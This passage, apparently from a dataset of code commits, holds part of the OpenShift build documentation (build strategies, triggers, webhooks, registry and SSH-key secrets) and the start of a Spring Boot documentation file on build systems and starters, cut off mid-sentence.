in the build configuration is\navailable locally on the node, that image will be used. However, to override the\nlocal image and refresh it from the registry to which the image stream points,\ncreate a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Docker\",\n \"dockerStrategy\": {\n \"forcePull\": true <1>\n }\n }\n}\n----\n\n<1> This flag causes the local builder image to be ignored, and a fresh version\nto be pulled from the registry to which the image stream points. Setting\n`*forcePull*` to *false* results in the default behavior of honoring the image\nstored locally.\n====\n\n\n[[custom-strategy-options]]\n\n== Custom Strategy Options\n\nThe following options are specific to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#custom-build[Custom\nbuild strategy].\n\n[[expose-docker-socket]]\n\n=== Expose Docker Socket\n\nIn order to allow the running of Docker commands and the\nbuilding of Docker images from inside the Docker container, the build container must be bound to an\naccessible socket. Set the `*exposeDockerSocket*` option to *true* to make this occur.\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Custom\",\n \"customStrategy\": {\n \"exposeDockerSocket\": true\n }\n }\n}\n----\n====\n\nifdef::openshift-origin[]\n[[custom-force-pull]]\n\n=== Force Pull\n\nBy default, when setting up the build pod, the build controller checks if the image specified in the build configuration is\navailable locally on the node. If so, that image will be used. However, to override the\nlocal image and refresh it from the registry to which the image stream points,\ncreate a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Custom\",\n \"customStrategy\": {\n \"forcePull\": true <1>\n }\n }\n}\n----\n\n<1> This flag causes the local builder image to be ignored, and a fresh version\nto be pulled from the registry to which the image stream points. 
Setting\n`*forcePull*` to *false* results in the default behavior of honoring the image\nstored locally.\n====\nendif::openshift-origin[]\n\n[[using-a-proxy-for-git-cloning]]\n\n== Using a Proxy for Git Cloning\nIf your Git repository can only be accessed using a proxy, you can define the\nproxy to use in the `*source*` section of the `*BuildConfig*`. You can configure\nboth a HTTP and HTTPS proxy to use. Both fields are optional.\n\n[NOTE]\n====\nYour source URI must use the HTTP or HTTPS protocol for this to work.\n====\n\n====\n\n[source,json]\n----\n\"source\": {\n \"type\": \"Git\",\n \"git\": {\n \"uri\": \"https:\/\/github.com\/openshift\/ruby-hello-world.git\", <1>\n \"httpProxy\" : \"http:\/\/someproxy.com\", <2>\n \"httpsProxy\" : \"https:\/\/someproxy.com\" <3>\n }\n}\n----\n\n<1> Must be an HTTP or HTTPS URI.\n<2> Specify the HTTP proxy to use.\n<3> Specify the HTTPS proxy to use.\n====\n\n[[starting-a-build]]\n\n== Starting a Build\nManually invoke a build using the following command:\n\n----\n$ oc start-build <BuildConfigName>\n----\n\nRe-run a build using the `--from-build` flag:\n\n----\n$ oc start-build --from-build=<buildName>\n----\n\nSpecify the `--follow` flag to stream the build's logs in stdout:\n\n----\n$ oc start-build <BuildConfigName> --follow\n----\n\n[[canceling-a-build]]\n\n== Canceling a Build\nManually cancel a build using the following command:\n\n----\n$ oc cancel-build <buildName>\n----\n\n[[accessing-build-logs]]\n\n== Accessing Build Logs\nTo allow access to build logs, use the following command:\n\n----\n$ oc build-logs <buildName>\n----\n\n*Log Verbosity*\n\nTo enable more verbose output, pass the `*BUILD_LOGLEVEL*` environment variable\nas part of the `*sourceStrategy*` or `*dockerStrategy*` in a `*BuildConfig*`:\n\n====\n\n----\n{\n \"sourceStrategy\": {\n ...\n \"env\": [\n {\n \"name\": \"BUILD_LOGLEVEL\",\n \"value\": \"2\" <1>\n }\n ]\n }\n}\n----\n\n<1> Adjust this value to the desired log level.\n====\n\nNOTE: A platform administrator can set verbosity for the entire OpenShift\ninstance by passing the `--loglevel` option to the `openshift start` command.\nIf both `--loglevel` and `BUILD_LOGLEVEL` are specified, `BUILD_LOGLEVEL` takes precedence.\n\nAvailable log levels for Source builds are as follows:\n\n[horizontal]\nLevel 0:: Produces output from containers running the *_assemble_* script and all encountered errors. This is the default.\nLevel 1:: Produces basic information about the executed process.\nLevel 2:: Produces very detailed information about the executed process.\nLevel 3:: Produces very detailed information about the executed process, and a listing of the archive contents.\nLevel 5:: Produces everything mentioned on previous levels and additionally provides docker push messages.\n\n[[source-code]]\n\n== Source Code\nThe source code location is one of the required parameters for the\n`*BuildConfig*`. The build uses this location and fetches the source code that\nis later built. The source code location definition is part of the\n`*parameters*` section in the `*BuildConfig*`:\n\n====\n\n----\n{\n \"source\" : {\n \"type\" : \"Git\", <1>\n \"git\" : { <2>\n \"uri\": \"git:\/\/github.com\/openshift\/ruby-hello-world.git\"\n },\n \"contextDir\": \"app\/dir\", <3>\n },\n}\n----\n\n<1> The `*type*` field describes which SCM is used to fetch your source code.\n<2> The `*git*` field contains the URI to the remote Git repository of the\nsource code. Optionally, specify the `*ref*` field to check out a specific Git\nreference. 
A valid `*ref*` can be a SHA1 tag or a branch name.\n<3> The `*contextDir*` field allows you to override the default location inside\nthe source code repository where the build looks for the application source\ncode. If your application exists inside a sub-directory, you can override the\ndefault location (the root folder) using this field.\n====\n\n[[build-triggers]]\n\n== Build Triggers\nWhen defining a `*BuildConfig*`, you can define triggers to control the\ncircumstances in which the `*BuildConfig*` should be run. The following build\ntriggers are available:\n\n* link:#webhook-triggers[Webhook]\n* link:#image-change-triggers[Image change]\n* link:#config-change-triggers[Configuration change]\n\n[[webhook-triggers]]\n\n=== Webhook Triggers\nWebhook triggers allow you to trigger a new build by sending a request to the\nOpenShift API endpoint. You can define these triggers using\nhttps:\/\/developer.github.com\/webhooks\/[GitHub webhooks] or Generic webhooks.\n\n*GitHub Webhooks*\n\nhttps:\/\/developer.github.com\/webhooks\/creating\/[GitHub webhooks] handle the call\nmade by GitHub when a repository is updated. When defining the trigger, you must\nspecify a link:..\/dev_guide\/secrets.html[`*secret*`] as part of the URL you supply\nto GitHub when configuring the webhook. The `*secret*` ensures that only you and\nyour repository can trigger the build. The following example is a trigger\ndefinition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"GitHub\",\n \"github\": {\n \"secret\": \"secret101\"\n }\n}\n----\n====\n\nThe payload URL is returned as the GitHub Webhook URL by the `describe` command\n(see link:#describe-buildconfig[below]), and is structured as follows:\n\n----\nhttp:\/\/<openshift_api_host:port>\/osapi\/v1\/namespaces\/<namespace>\/buildconfigs\/<name>\/webhooks\/<secret>\/github\n----\n\n*Generic Webhooks*\n\nGeneric webhooks can be invoked from any system capable of making a web\nrequest. As with a GitHub webhook, you must specify a `*secret*` when defining the\ntrigger, and the caller must provide this `*secret*` to trigger the build. The\nfollowing is an example trigger definition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"Generic\",\n \"generic\": {\n \"secret\": \"secret101\"\n }\n}\n----\n====\n\nTo set up the caller, supply the calling system with the URL of the generic\nwebhook endpoint for your build:\n\n----\nhttp:\/\/<openshift_api_host:port>\/osapi\/v1\/namespaces\/<namespace>\/buildconfigs\/<name>\/webhooks\/<secret>\/generic\n----\n\nThe endpoint can accept an optional payload with the following format:\n\n====\n\n----\n{\n type: 'git',\n git: {\n uri: '<url to git repository>',\n ref: '<optional git reference>',\n commit: '<commit hash identifying a specific git commit>',\n author: {\n name: '<author name>',\n email: '<author e-mail>',\n },\n committer: {\n name: '<committer name>',\n email: '<committer e-mail>',\n },\n message: '<commit message>'\n }\n}\n----\n====\n\n[[describe-buildconfig]]\n\n*Displaying a BuildConfig's Webhook URLs*\n\nUse the following command to display the webhook URLs associated with a build\nconfiguration:\n\n----\n$ oc describe bc <name>\n----\n\nIf the above command does not display any webhook URLs, then no webhook trigger\nis defined for that build configuration.\n\n[[image-change-triggers]]\n\n=== Image Change Triggers\nImage change triggers allow your build to be automatically invoked when a new\nversion of an upstream image is available. 
For example, if a build is based on\ntop of a RHEL image, then you can trigger that build to run any time the RHEL\nimage changes. As a result, the application image is always running on the\nlatest RHEL base image.\n\nConfiguring an image change trigger requires the following actions:\n\n. Define an `*ImageStream*` that points to the upstream image you want to\ntrigger on:\n+\n====\n\n----\n{\n \"kind\": \"ImageStream\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"ruby-20-centos7\"\n }\n}\n----\n====\n+\nThis defines the image stream that is tied to a Docker image repository\nlocated at `_<system-registry>_\/_<namespace>_\/ruby-20-centos7`. The\n`_<system-registry>_` is defined as a service with the name `docker-registry`\nrunning in OpenShift.\n\n. If an image stream is the base image for the build, set the `*from*` field in the\nbuild strategy to point to the image stream:\n+\n====\n\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"ruby-20-centos7:latest\"\n }\n }\n }\n}\n----\n====\n+\nIn this case, the `*sourceStrategy*` definition is consuming the `latest` tag of\nthe image stream named `ruby-20-centos7` located within this namespace.\n\n. Define a build with one or more triggers that point to image streams:\n+\n====\n\n----\n{\n \"type\": \"imageChange\", <1>\n \"imageChange\": {}\n}\n{\n \"type\": \"imageChange\", <2>\n \"imageChange\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"custom-image:latest\"\n }\n }\n}\n----\n\n<1> An image change trigger that monitors the `*ImageStream*` and\n`*Tag*` as defined by the build strategy's `*from*` field. The `*imageChange*` part\nmust be empty.\n<2> An image change trigger that monitors an arbitrary image stream. The `*imageChange*`\npart in this case must include a `*from*` field that references the `*ImageStreamTag*` to monitor.\n====\n\nWhen using an image change trigger for the strategy image stream, the generated build\nis supplied with an immutable Docker tag that points to the latest image corresponding\nto that tag. This new image reference will be used by the strategy\nwhen it executes for the build. For other image change triggers that do not\nreference the strategy image stream, a new build will be started, but the build\nstrategy will not be updated with a unique image reference.\n\nIn the example above that has an image change trigger for the strategy, the resulting build will be:\n\n====\n\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"DockerImage\",\n \"name\": \"172.30.17.3:5001\/mynamespace\/ruby-20-centos7:immutableid\"\n }\n }\n }\n}\n----\n====\n\nThis ensures that the triggered build uses the new image that was just pushed to\nthe repository, and the build can be re-run any time with the same inputs.\n\nIn addition to setting the image field for all `*Strategy*` types, for custom\nbuilds, the `OPENSHIFT_CUSTOM_BUILD_BASE_IMAGE` environment variable is checked.\nIf it does not exist, then it is created with the immutable image reference. If\nit does exist, then it is updated with the immutable image reference.\n\nIf a build is triggered due to a webhook trigger or manual request,\nthe build that is created uses the `*immutableid*` resolved from the\n`*ImageStream*` referenced by the `*Strategy*`. 
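For instance, with a hypothetical `*BuildConfig*` named `ruby-sample-build` that uses the strategy image stream shown above, a manual run such as the following still resolves the strategy image through the `*ImageStream*`:\n\n----\n$ oc start-build ruby-sample-build\n----\n\n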
This ensures that builds\nare performed using consistent image tags for ease of reproduction.\n\n[NOTE]\n====\nImage streams that point to Docker images in v1 Docker registries will only trigger a build\nonce when the image stream tag becomes available and not on subsequent image updates. This is due\nto the lack of uniquely identifiable images in v1 Docker registries.\n====\n\n[[config-change-triggers]]\n=== Configuration Change Triggers\nA configuration change trigger allows a build to be automatically invoked as\nsoon as a new `*BuildConfig*` is created. The following is an example trigger\ndefinition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"ConfigChange\"\n}\n----\n\n====\n\n[NOTE]\n====\nConfiguration change triggers currently only work when creating a new\n`*BuildConfig*`. In a future release, configuration change triggers will also be\nable to launch a build whenever a `*BuildConfig*` is updated.\n====\n\n[#using-docker-credentials-for-pushing-and-pulling-images]\n== Using Docker Credentials for Pushing and Pulling Images\n\nSupply the *_.dockercfg_* file with valid Docker Registry credentials in order to\npush the output image into a private Docker Registry or pull the builder image\nfrom the private Docker Registry that requires authentication. For the OpenShift\nDocker Registry, you don't have to do this because `*secrets*` are generated\nautomatically for you by OpenShift.\n\nThe *_.dockercfg_* JSON file is found in your home directory by default and has\nthe following format:\n\n====\n\n----\n{\n\t\"https:\/\/index.docker.io\/v1\/\": { <1>\n\t\t\"auth\": \"YWRfbGzhcGU6R2labnRib21ifTE=\", <2>\n\t\t\"email\": \"user@example.com\" <3>\n\t}\n}\n----\n\n<1> URL of the registry.\n<2> Base64-encoded `username:password` credentials (encoded, not encrypted).\n<3> Email address for the login.\n====\n\nYou can define multiple Docker registry entries in this file. Alternatively, you\ncan also add authentication entries to this file by running the `docker login`\ncommand. The file will be created if it does not exist. Kubernetes provides\nhttps:\/\/github.com\/GoogleCloudPlatform\/kubernetes\/blob\/master\/docs\/design\/secrets.md[`*secrets*`],\nwhich are used to store your configuration and passwords.\n\n. Create the `*secret*` from your local *_.dockercfg_* file:\n+\n====\n----\n$ oc secrets new dockerhub ~\/.dockercfg\n----\n====\n+\nThis generates a JSON specification of the `*secret*` named *dockerhub* and\ncreates the object.\n\n. Once the `*secret*` is created, add it to the builder service account:\n+\n====\n----\n$ oc secrets add serviceaccount\/builder secrets\/dockerhub\n----\n====\n\n. Add a `*pushSecret*` field into the `*output*` section of the `*BuildConfig*` and\nset it to the name of the `*secret*` that you created, which in the above example\nis *dockerhub*:\n+\n====\n\n----\n{\n \"parameters\": {\n \"output\": {\n \"to\": {\n \"name\": \"private-image\"\n },\n \"pushSecret\": {\n \"name\": \"dockerhub\"\n }\n }\n }\n}\n----\n====\n\n. 
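(Optional) Verify that the *dockerhub* `*secret*` from the previous steps is associated with the builder service account. This is only a quick sanity check; the output is omitted here:\n+\n====\n----\n$ oc describe serviceaccount\/builder\n----\n====\n\n. 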
Pull the builder Docker image from a private Docker registry by specifying the\n`*pullSecret*` field, which is part of the build strategy definition:\n+\n====\n\n----\n{\n \"strategy\": {\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"DockerImage\",\n \"name\": \"docker.io\/user\/private_repository\"\n },\n \"pullSecret\": {\n \"name\": \"dockerhub\"\n }\n },\n \"type\": \"Source\"\n }\n}\n----\n====\n\n[#using-private-repositories-for-builds]\n== Using Private Repositories for Builds\n\nSupply valid credentials to build an application from a private repository.\nCurrently, only SSH key-based authentication is supported. The repository keys\nare located in the `$HOME\/.ssh\/` directory, and are named `id_dsa.pub`,\n`id_ecdsa.pub`, `id_ed25519.pub`, or `id_rsa.pub` by default. Generate SSH key\ncredentials with the following command:\n\n====\n\n----\n$ ssh-keygen -t rsa -C \"your_email@example.com\"\n----\n====\n\nTwo files are created: the public key and a corresponding private key (one of\n`id_dsa`, `id_ecdsa`, `id_ed25519`, or `id_rsa`). With both of these in place,\nconsult your source control management (SCM) system's manual on how to upload\nthe public key. The private key will be used to access your private repository.\n\nA link:..\/dev_guide\/secrets.html[`*secret*`]\nis used to store your keys.\n\n. Create the `*secret*` before using the SSH key to access the private\nrepository:\n+\n====\n----\n$ oc secrets new scmsecret ssh-privatekey=$HOME\/.ssh\/id_rsa\n----\n====\n\n\n. Add the `*secret*` to the builder service account:\n+\n====\n\n----\n$ oc secrets add serviceaccount\/builder secrets\/scmsecret\n----\n====\n\n\n. Add a `*sourceSecret*` field into the `*source*` section inside the\n`*BuildConfig*` and set it to the name of the `*secret*` that you created, in\nthis case `*scmsecret*`:\n+\n====\n\n----\n{\n \"apiVersion\": \"v1\",\n \"kind\": \"BuildConfig\",\n \"metadata\": {\n \"name\": \"sample-build\"\n },\n \"parameters\": {\n \"output\": {\n \"to\": {\n \"name\": \"sample-image\"\n }\n },\n \"source\": {\n \"git\": {\n \"uri\": \"git@repository.com:user\/app.git\" <1>\n },\n \"sourceSecret\": {\n \"name\": \"scmsecret\"\n },\n \"type\": \"Git\"\n },\n \"strategy\": {\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"python-33-centos7:latest\"\n }\n },\n \"type\": \"Source\"\n }\n }\n}\n----\n<1> The URL of the private repository is usually in the form\n`git@example.com:<username>\/<repository>`.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f95486822d07927daed81e7eeb3258c139419cf","subject":"Polish note about Maven\/Gradle restarts","message":"Polish note about Maven\/Gradle restarts\n\nSee 
gh-24271\n","repos":"wilkinsona\/spring-boot,spring-projects\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,mbenson\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,mdeinum\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,jxblum\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,htynkn\/spring-boot,chrylis\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,scottfrederick\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,mbenson\/spring-boot,vpavic\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,mdeinum\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,Buzzardo\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,mbenson\/spring-boot,vpavic\/spring-boot,Buzzardo\/spring-boot,michael-simons\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,philwebb\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_contents":"[[using-boot]]\n= Using Spring Boot\ninclude::attributes.adoc[]\n\nThis section goes into more detail about how you should use Spring Boot.\nIt covers topics such as build systems, auto-configuration, and how to run your applications.\nWe also cover some Spring Boot best practices.\nAlthough there is nothing particularly special about Spring Boot (it is just another library that you can consume), there are a few recommendations that, when followed, make your development process a little easier.\n\nIf you are starting out with Spring Boot, you should probably read the _<<getting-started.adoc#getting-started, Getting Started>>_ guide before diving into this section.\n\n\n\n[[using-boot-build-systems]]\n== Build Systems\nIt is strongly recommended that you choose a build system that supports <<using-boot-dependency-management,_dependency management_>> and that can consume artifacts published to the \"`Maven Central`\" repository.\nWe would recommend that you choose Maven or Gradle.\nIt is possible to get Spring Boot to work with other build systems (Ant, for example), but they are not particularly well supported.\n\n\n\n[[using-boot-dependency-management]]\n=== Dependency Management\nEach release of Spring Boot provides a curated list of 
dependencies that it supports.\nIn practice, you do not need to provide a version for any of these dependencies in your build configuration, as Spring Boot manages that for you.\nWhen you upgrade Spring Boot itself, these dependencies are upgraded as well in a consistent way.\n\nNOTE: You can still specify a version and override Spring Boot's recommendations if you need to do so.\n\nThe curated list contains all the spring modules that you can use with Spring Boot as well as a refined list of third party libraries.\nThe list is available as a standard <<using-boot-maven-without-a-parent,Bills of Materials (`spring-boot-dependencies`)>> that can be used with both <<using-boot-maven-parent-pom,Maven>> and <<using-boot-gradle,Gradle>>.\n\nWARNING: Each release of Spring Boot is associated with a base version of the Spring Framework.\nWe **highly** recommend that you not specify its version.\n\n\n\n[[using-boot-maven]]\n=== Maven\nMaven users can inherit from the `spring-boot-starter-parent` project to obtain sensible defaults.\nThe parent project provides the following features:\n\n* Java 1.8 as the default compiler level.\n* UTF-8 source encoding.\n* A <<using-boot-dependency-management,Dependency Management section>>, inherited from the spring-boot-dependencies pom, that manages the versions of common dependencies.\nThis dependency management lets you omit <version> tags for those dependencies when used in your own pom.\n* An execution of the {spring-boot-maven-plugin-docs}\/repackage-mojo.html[`repackage` goal] with a `repackage` execution id.\n* Sensible https:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/examples\/filter.html[resource filtering].\n* Sensible plugin configuration (https:\/\/www.mojohaus.org\/exec-maven-plugin\/[exec plugin], https:\/\/github.com\/ktoso\/maven-git-commit-id-plugin[Git commit ID], and https:\/\/maven.apache.org\/plugins\/maven-shade-plugin\/[shade]).\n* Sensible resource filtering for `application.properties` and `application.yml` including profile-specific files (for example, `application-dev.properties` and `application-dev.yml`)\n\nNote that, since the `application.properties` and `application.yml` files accept Spring style placeholders (`${...}`), the Maven filtering is changed to use `@..@` placeholders.\n(You can override that by setting a Maven property called `resource.delimiter`.)\n\n\n\n[[using-boot-maven-parent-pom]]\n==== Inheriting the Starter Parent\nTo configure your project to inherit from the `spring-boot-starter-parent`, set the `parent` as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<!-- Inherit defaults from Spring Boot -->\n\t<parent>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-parent<\/artifactId>\n\t\t<version>{spring-boot-version}<\/version>\n\t<\/parent>\n----\n\nNOTE: You should need to specify only the Spring Boot version number on this dependency.\nIf you import additional starters, you can safely omit the version number.\n\nWith that setup, you can also override individual dependencies by overriding a property in your own project.\nFor instance, to upgrade to another Spring Data release train, you would add the following to your `pom.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<spring-data-releasetrain.version>Fowler-SR2<\/spring-data-releasetrain.version>\n\t<\/properties>\n----\n\nTIP: Check the 
{spring-boot-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies` pom] for a list of supported properties.\n\n\n\n[[using-boot-maven-without-a-parent]]\n==== Using Spring Boot without the Parent POM\nNot everyone likes inheriting from the `spring-boot-starter-parent` POM.\nYou may have your own corporate standard parent that you need to use or you may prefer to explicitly declare all your Maven configuration.\n\nIf you do not want to use the `spring-boot-starter-parent`, you can still keep the benefit of the dependency management (but not the plugin management) by using a `scope=import` dependency, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencyManagement>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<!-- Import dependency management from Spring Boot -->\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-dependencies<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/dependencyManagement>\n----\n\nThe preceding sample setup does not let you override individual dependencies by using a property, as explained above.\nTo achieve the same result, you need to add an entry in the `dependencyManagement` of your project **before** the `spring-boot-dependencies` entry.\nFor instance, to upgrade to another Spring Data release train, you could add the following element to your `pom.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencyManagement>\n\t\t<dependencies>\n\t\t\t<!-- Override Spring Data release train provided by Spring Boot -->\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework.data<\/groupId>\n\t\t\t\t<artifactId>spring-data-releasetrain<\/artifactId>\n\t\t\t\t<version>Moore-SR10<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-dependencies<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/dependencyManagement>\n----\n\nNOTE: In the preceding example, we specify a _BOM_, but any dependency type can be overridden in the same way.\n\n\n\n[[using-boot-maven-plugin]]\n==== Using the Spring Boot Maven Plugin\nSpring Boot includes a <<build-tool-plugins.adoc#build-tool-plugins-maven-plugin, Maven plugin>> that can package the project as an executable jar.\nAdd the plugin to your `<plugins>` section if you want to use it, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nNOTE: If you use the Spring Boot starter parent pom, you need to add only the plugin.\nThere is no need to configure it unless you want to change the settings defined in the parent.\n\n\n\n[[using-boot-gradle]]\n=== Gradle\nTo learn about using Spring Boot with Gradle, please refer to the documentation for Spring Boot's Gradle plugin:\n\n* Reference ({spring-boot-gradle-plugin-docs}[HTML] and {spring-boot-gradle-plugin-pdfdocs}[PDF])\n* {spring-boot-gradle-plugin-api}[API]\n\n\n\n[[using-boot-ant]]\n=== Ant\nIt is 
possible to build a Spring Boot project using Apache Ant+Ivy.\nThe `spring-boot-antlib` \"`AntLib`\" module is also available to help Ant create executable jars.\n\nTo declare dependencies, a typical `ivy.xml` file looks something like the following example:\n\n[source,xml,indent=0]\n----\n\t<ivy-module version=\"2.0\">\n\t\t<info organisation=\"org.springframework.boot\" module=\"spring-boot-sample-ant\" \/>\n\t\t<configurations>\n\t\t\t<conf name=\"compile\" description=\"everything needed to compile this module\" \/>\n\t\t\t<conf name=\"runtime\" extends=\"compile\" description=\"everything needed to run this module\" \/>\n\t\t<\/configurations>\n\t\t<dependencies>\n\t\t\t<dependency org=\"org.springframework.boot\" name=\"spring-boot-starter\"\n\t\t\t\trev=\"${spring-boot.version}\" conf=\"compile\" \/>\n\t\t<\/dependencies>\n\t<\/ivy-module>\n----\n\nA typical `build.xml` looks like the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<project\n\t\txmlns:ivy=\"antlib:org.apache.ivy.ant\"\n\t\txmlns:spring-boot=\"antlib:org.springframework.boot.ant\"\n\t\tname=\"myapp\" default=\"build\">\n\n\t\t<property name=\"spring-boot.version\" value=\"{spring-boot-version}\" \/>\n\n\t\t<target name=\"resolve\" description=\"--> retrieve dependencies with ivy\">\n\t\t\t<ivy:retrieve pattern=\"lib\/[conf]\/[artifact]-[type]-[revision].[ext]\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"classpaths\" depends=\"resolve\">\n\t\t\t<path id=\"compile.classpath\">\n\t\t\t\t<fileset dir=\"lib\/compile\" includes=\"*.jar\" \/>\n\t\t\t<\/path>\n\t\t<\/target>\n\n\t\t<target name=\"init\" depends=\"classpaths\">\n\t\t\t<mkdir dir=\"build\/classes\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"compile\" depends=\"init\" description=\"compile\">\n\t\t\t<javac srcdir=\"src\/main\/java\" destdir=\"build\/classes\" classpathref=\"compile.classpath\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"build\" depends=\"compile\">\n\t\t\t<spring-boot:exejar destfile=\"build\/myapp.jar\" classes=\"build\/classes\">\n\t\t\t\t<spring-boot:lib>\n\t\t\t\t\t<fileset dir=\"lib\/runtime\" \/>\n\t\t\t\t<\/spring-boot:lib>\n\t\t\t<\/spring-boot:exejar>\n\t\t<\/target>\n\t<\/project>\n----\n\nTIP: If you do not want to use the `spring-boot-antlib` module, see the _<<howto.adoc#howto-build-an-executable-archive-with-ant>>_ \"`How-to`\" .\n\n\n\n[[using-boot-starter]]\n=== Starters\nStarters are a set of convenient dependency descriptors that you can include in your application.\nYou get a one-stop shop for all the Spring and related technologies that you need without having to hunt through sample code and copy-paste loads of dependency descriptors.\nFor example, if you want to get started using Spring and JPA for database access, include the `spring-boot-starter-data-jpa` dependency in your project.\n\nThe starters contain a lot of the dependencies that you need to get a project up and running quickly and with a consistent, supported set of managed transitive dependencies.\n\n.What's in a name\n****\nAll **official** starters follow a similar naming pattern; `+spring-boot-starter-*+`, where `+*+` is a particular type of application.\nThis naming structure is intended to help when you need to find a starter.\nThe Maven integration in many IDEs lets you search dependencies by name.\nFor example, with the appropriate Eclipse or STS plugin installed, you can press `ctrl-space` in the POM editor and type \"`spring-boot-starter`\" for a complete list.\n\nAs explained in the 
\"`<<spring-boot-features#boot-features-custom-starter,Creating Your Own Starter>>`\" section, third party starters should not start with `spring-boot`, as it is reserved for official Spring Boot artifacts.\nRather, a third-party starter typically starts with the name of the project.\nFor example, a third-party starter project called `thirdpartyproject` would typically be named `thirdpartyproject-spring-boot-starter`.\n****\n\nThe following application starters are provided by Spring Boot under the `org.springframework.boot` group:\n\n.Spring Boot application starters\ninclude::{generated-resources-root}\/application-starters.adoc[]\n\nIn addition to the application starters, the following starters can be used to add _<<production-ready-features.adoc#production-ready, production ready>>_ features:\n\n.Spring Boot production starters\ninclude::{generated-resources-root}\/production-starters.adoc[]\n\nFinally, Spring Boot also includes the following starters that can be used if you want to exclude or swap specific technical facets:\n\n.Spring Boot technical starters\ninclude::{generated-resources-root}\/technical-starters.adoc[]\n\nTo learn how to swap technical facets, please see the how-to documentation for <<howto.adoc#howto-use-another-web-server, swapping web server>> and <<howto.adoc#howto-configure-log4j-for-logging, 